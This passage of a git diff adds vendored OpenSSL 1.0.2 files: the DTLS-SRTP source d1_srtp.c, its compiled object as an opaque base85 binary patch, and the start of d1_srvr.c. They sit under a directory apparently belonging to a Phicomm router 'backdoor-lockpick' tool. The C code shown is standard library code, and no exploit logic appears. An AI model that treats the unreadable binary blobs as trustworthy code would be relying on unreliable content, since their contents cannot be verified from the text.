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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srtp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srtp.c
new file mode 100644
index 0000000..64d0634
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srtp.c
@@ -0,0 +1,448 @@
+/* ssl/t1_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/*
+ * DTLS code by Eric Rescorla <ekr@rtfm.com>
+ *
+ * Copyright (C) 2006, Network Resonance, Inc. Copyright (C) 2011, RTFM, Inc.
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+#include "srtp.h"
+
+#ifndef OPENSSL_NO_SRTP
+
+static SRTP_PROTECTION_PROFILE srtp_known_profiles[] = {
+    {
+     "SRTP_AES128_CM_SHA1_80",
+     SRTP_AES128_CM_SHA1_80,
+     },
+    {
+     "SRTP_AES128_CM_SHA1_32",
+     SRTP_AES128_CM_SHA1_32,
+     },
+# if 0
+    {
+     "SRTP_NULL_SHA1_80",
+     SRTP_NULL_SHA1_80,
+     },
+    {
+     "SRTP_NULL_SHA1_32",
+     SRTP_NULL_SHA1_32,
+     },
+# endif
+    {0}
+};
+
+static int find_profile_by_name(char *profile_name,
+                                SRTP_PROTECTION_PROFILE **pptr, unsigned len)
+{
+    SRTP_PROTECTION_PROFILE *p;
+
+    p = srtp_known_profiles;
+    while (p->name) {
+        if ((len == strlen(p->name)) && !strncmp(p->name, profile_name, len)) {
+            *pptr = p;
+            return 0;
+        }
+
+        p++;
+    }
+
+    return 1;
+}
+
+static int ssl_ctx_make_profiles(const char *profiles_string,
+                                 STACK_OF(SRTP_PROTECTION_PROFILE) **out)
+{
+    STACK_OF(SRTP_PROTECTION_PROFILE) *profiles;
+
+    char *col;
+    char *ptr = (char *)profiles_string;
+
+    SRTP_PROTECTION_PROFILE *p;
+
+    if (!(profiles = sk_SRTP_PROTECTION_PROFILE_new_null())) {
+        SSLerr(SSL_F_SSL_CTX_MAKE_PROFILES,
+               SSL_R_SRTP_COULD_NOT_ALLOCATE_PROFILES);
+        return 1;
+    }
+
+    do {
+        col = strchr(ptr, ':');
+
+        if (!find_profile_by_name(ptr, &p,
+                                  col ? col - ptr : (int)strlen(ptr))) {
+            if (sk_SRTP_PROTECTION_PROFILE_find(profiles, p) >= 0) {
+                SSLerr(SSL_F_SSL_CTX_MAKE_PROFILES,
+                       SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST);
+                sk_SRTP_PROTECTION_PROFILE_free(profiles);
+                return 1;
+            }
+
+            sk_SRTP_PROTECTION_PROFILE_push(profiles, p);
+        } else {
+            SSLerr(SSL_F_SSL_CTX_MAKE_PROFILES,
+                   SSL_R_SRTP_UNKNOWN_PROTECTION_PROFILE);
+            sk_SRTP_PROTECTION_PROFILE_free(profiles);
+            return 1;
+        }
+
+        if (col)
+            ptr = col + 1;
+    } while (col);
+
+    *out = profiles;
+
+    return 0;
+}
+
+int SSL_CTX_set_tlsext_use_srtp(SSL_CTX *ctx, const char *profiles)
+{
+    return ssl_ctx_make_profiles(profiles, &ctx->srtp_profiles);
+}
+
+int SSL_set_tlsext_use_srtp(SSL *s, const char *profiles)
+{
+    return ssl_ctx_make_profiles(profiles, &s->srtp_profiles);
+}
+
+STACK_OF(SRTP_PROTECTION_PROFILE) *SSL_get_srtp_profiles(SSL *s)
+{
+    if (s != NULL) {
+        if (s->srtp_profiles != NULL) {
+            return s->srtp_profiles;
+        } else if ((s->ctx != NULL) && (s->ctx->srtp_profiles != NULL)) {
+            return s->ctx->srtp_profiles;
+        }
+    }
+
+    return NULL;
+}
+
+SRTP_PROTECTION_PROFILE *SSL_get_selected_srtp_profile(SSL *s)
+{
+    return s->srtp_profile;
+}
+
+/*
+ * Note: this function returns 0 length if there are no profiles specified
+ */
+int ssl_add_clienthello_use_srtp_ext(SSL *s, unsigned char *p, int *len,
+                                     int maxlen)
+{
+    int ct = 0;
+    int i;
+    STACK_OF(SRTP_PROTECTION_PROFILE) *clnt = 0;
+    SRTP_PROTECTION_PROFILE *prof;
+
+    clnt = SSL_get_srtp_profiles(s);
+    ct = sk_SRTP_PROTECTION_PROFILE_num(clnt); /* -1 if clnt == 0 */
+
+    if (p) {
+        if (ct == 0) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_USE_SRTP_EXT,
+                   SSL_R_EMPTY_SRTP_PROTECTION_PROFILE_LIST);
+            return 1;
+        }
+
+        if ((2 + ct * 2 + 1) > maxlen) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_USE_SRTP_EXT,
+                   SSL_R_SRTP_PROTECTION_PROFILE_LIST_TOO_LONG);
+            return 1;
+        }
+
+        /* Add the length */
+        s2n(ct * 2, p);
+        for (i = 0; i < ct; i++) {
+            prof = sk_SRTP_PROTECTION_PROFILE_value(clnt, i);
+            s2n(prof->id, p);
+        }
+
+        /* Add an empty use_mki value */
+        *p++ = 0;
+    }
+
+    *len = 2 + ct * 2 + 1;
+
+    return 0;
+}
+
+int ssl_parse_clienthello_use_srtp_ext(SSL *s, unsigned char *d, int len,
+                                       int *al)
+{
+    SRTP_PROTECTION_PROFILE *sprof;
+    STACK_OF(SRTP_PROTECTION_PROFILE) *srvr;
+    int ct;
+    int mki_len;
+    int i, srtp_pref;
+    unsigned int id;
+
+    /* Length value + the MKI length */
+    if (len < 3) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT,
+               SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST);
+        *al = SSL_AD_DECODE_ERROR;
+        return 1;
+    }
+
+    /* Pull off the length of the cipher suite list */
+    n2s(d, ct);
+    len -= 2;
+
+    /* Check that it is even */
+    if (ct % 2) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT,
+               SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST);
+        *al = SSL_AD_DECODE_ERROR;
+        return 1;
+    }
+
+    /* Check that lengths are consistent */
+    if (len < (ct + 1)) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT,
+               SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST);
+        *al = SSL_AD_DECODE_ERROR;
+        return 1;
+    }
+
+    srvr = SSL_get_srtp_profiles(s);
+    s->srtp_profile = NULL;
+    /* Search all profiles for a match initially */
+    srtp_pref = sk_SRTP_PROTECTION_PROFILE_num(srvr);
+
+    while (ct) {
+        n2s(d, id);
+        ct -= 2;
+        len -= 2;
+
+        /*
+         * Only look for match in profiles of higher preference than
+         * current match.
+         * If no profiles have been have been configured then this
+         * does nothing.
+         */
+        for (i = 0; i < srtp_pref; i++) {
+            sprof = sk_SRTP_PROTECTION_PROFILE_value(srvr, i);
+            if (sprof->id == id) {
+                s->srtp_profile = sprof;
+                srtp_pref = i;
+                break;
+            }
+        }
+    }
+
+    /*
+     * Now extract the MKI value as a sanity check, but discard it for now
+     */
+    mki_len = *d;
+    d++;
+    len--;
+
+    if (mki_len != len) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT,
+               SSL_R_BAD_SRTP_MKI_VALUE);
+        *al = SSL_AD_DECODE_ERROR;
+        return 1;
+    }
+
+    return 0;
+}
+
+int ssl_add_serverhello_use_srtp_ext(SSL *s, unsigned char *p, int *len,
+                                     int maxlen)
+{
+    if (p) {
+        if (maxlen < 5) {
+            SSLerr(SSL_F_SSL_ADD_SERVERHELLO_USE_SRTP_EXT,
+                   SSL_R_SRTP_PROTECTION_PROFILE_LIST_TOO_LONG);
+            return 1;
+        }
+
+        if (s->srtp_profile == 0) {
+            SSLerr(SSL_F_SSL_ADD_SERVERHELLO_USE_SRTP_EXT,
+                   SSL_R_USE_SRTP_NOT_NEGOTIATED);
+            return 1;
+        }
+        s2n(2, p);
+        s2n(s->srtp_profile->id, p);
+        *p++ = 0;
+    }
+    *len = 5;
+
+    return 0;
+}
+
+int ssl_parse_serverhello_use_srtp_ext(SSL *s, unsigned char *d, int len,
+                                       int *al)
+{
+    unsigned id;
+    int i;
+    int ct;
+
+    STACK_OF(SRTP_PROTECTION_PROFILE) *clnt;
+    SRTP_PROTECTION_PROFILE *prof;
+
+    if (len != 5) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT,
+               SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST);
+        *al = SSL_AD_DECODE_ERROR;
+        return 1;
+    }
+
+    n2s(d, ct);
+    if (ct != 2) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT,
+               SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST);
+        *al = SSL_AD_DECODE_ERROR;
+        return 1;
+    }
+
+    n2s(d, id);
+    if (*d) {                   /* Must be no MKI, since we never offer one */
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT,
+               SSL_R_BAD_SRTP_MKI_VALUE);
+        *al = SSL_AD_ILLEGAL_PARAMETER;
+        return 1;
+    }
+
+    clnt = SSL_get_srtp_profiles(s);
+
+    /* Throw an error if the server gave us an unsolicited extension */
+    if (clnt == NULL) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT,
+               SSL_R_NO_SRTP_PROFILES);
+        *al = SSL_AD_DECODE_ERROR;
+        return 1;
+    }
+
+    /*
+     * Check to see if the server gave us something we support (and
+     * presumably offered)
+     */
+    for (i = 0; i < sk_SRTP_PROTECTION_PROFILE_num(clnt); i++) {
+        prof = sk_SRTP_PROTECTION_PROFILE_value(clnt, i);
+
+        if (prof->id == id) {
+            s->srtp_profile = prof;
+            *al = 0;
+            return 0;
+        }
+    }
+
+    SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT,
+           SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST);
+    *al = SSL_AD_DECODE_ERROR;
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srtp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srtp.o
new file mode 100644
index 0000000000000000000000000000000000000000..73f73d9f940432160848b82ee3960afd9206e261
GIT binary patch
literal 5000
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
M;y;GY1hLQm4=g&u!vFvP

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srvr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srvr.c
new file mode 100644
index 0000000..eafa012
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srvr.c
@@ -0,0 +1,956 @@
+/* ssl/d1_srvr.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
